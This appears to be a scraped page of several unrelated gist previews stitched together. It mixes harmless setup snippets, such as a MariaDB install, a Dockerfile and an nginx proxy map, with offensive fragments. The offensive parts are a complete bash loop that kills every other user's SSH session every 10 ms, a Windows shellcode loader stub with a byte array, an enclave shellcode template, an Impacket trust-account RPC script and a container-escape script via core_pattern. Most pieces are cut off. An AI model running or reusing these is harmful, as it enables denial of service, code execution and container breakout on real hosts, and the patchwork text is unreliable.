5-minute POC, inspired by https://x.com/IceSolst/status/1986764951940124676?s=20
# Install the MariaDB server and client packages without prompting
sudo dnf -y install mariadb-server mariadb
# Start the service now, then register it to start on every boot
for action in start enable; do
  sudo systemctl "$action" mariadb
done
5-minute POC, inspired by https://x.com/IceSolst/status/1986764951940124676?s=20
# Pull in MariaDB (server + client) non-interactively via dnf
sudo dnf -y install mariadb-server mariadb
# Bring the daemon up immediately, then make it persistent across reboots
for unit_action in start enable; do
  sudo systemctl "$unit_action" mariadb
done
| /* | |
| ## File Descriptor INT_MAX Overflow | |
| ---- | |
| - Info: | |
| Tweet: https://x.com/spendergrsec/status/1958264076162998771 | |
| Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370 |
# Name of the current terminal with the leading /dev/ stripped (e.g. pts/0);
# used below to recognise this operator's own sshd-session process(es).
MY_TTY=$(tty | sed 's/\/dev\///')
# PIDs of sshd-session processes whose ps line mentions this tty, joined with
# '|' into a regex alternation (trailing '|' removed). These are never killed.
# NOTE(review): the grep's own command line also matches this pattern, so its
# already-exited PID may end up in the set — harmless, but worth knowing.
MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//')
echo "Protecting PIDs: $MY_SESSION_PIDS"
# Tight loop: every 10 ms, SIGKILL every sshd-session process that is neither
# the listener nor in the protected set, i.e. every other user's SSH session on
# this host is torn down. Detection note: a 10 ms cadence of ps/grep/awk/xargs/
# kill execve events from a single tty is unmistakable in process-audit logs.
while true; do
ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null
sleep 0.01 # Check every 10ms - way faster
done
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
| stream { | |
| map $ssl_preread_server_name $singbox { | |
| trojan.example.com trojan; | |
| trojan-ws.example.com trojan-ws; | |
| trojan-ws-6.example.com trojan-ws-6; | |
| vmess.example.com vmess; | |
| vmess-ws.example.com vmess-ws; | |
| vmess-ws-6.example.com vmess-ws-6; | |
| } | |
| upstream trojan { |
| from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc | |
| from impacket.uuid import bin_to_uuidtup | |
| from binascii import unhexlify | |
| from random import randbytes | |
| import sys | |
| # Perform an LsarLookupSids3 call as a trust account; Netlogon is used as the SSP (see [MS-NRPC] 3.3) | |
| # Pure TCP RPC is used (ncacn_ip_tcp option) | |
| # AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848) | |
| # Tested with impacket 0.12.0 on GOAD |
| # Copyright (c) 2023 Ho Kim ([email protected]). All rights reserved. | |
| # Configure environment variables | |
| ARG ROCKYLINUX_VERSION="8" | |
| # Be ready for serving | |
| FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base | |
| # Install desktop environment dependencies | |
| RUN dnf install -y \ |
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
| #!/bin/bash | |
| # | |
| # core_pattern_escape.sh | |
| # Simple script to escape a container via /proc/sys/kernel/core_pattern | |
| # By J. Stuart McMurray | |
| # Created 20241026 | |
| # Last Modified 20241026 | |
| # Drop to /esc (or whatever name) in a container and... | |
| # |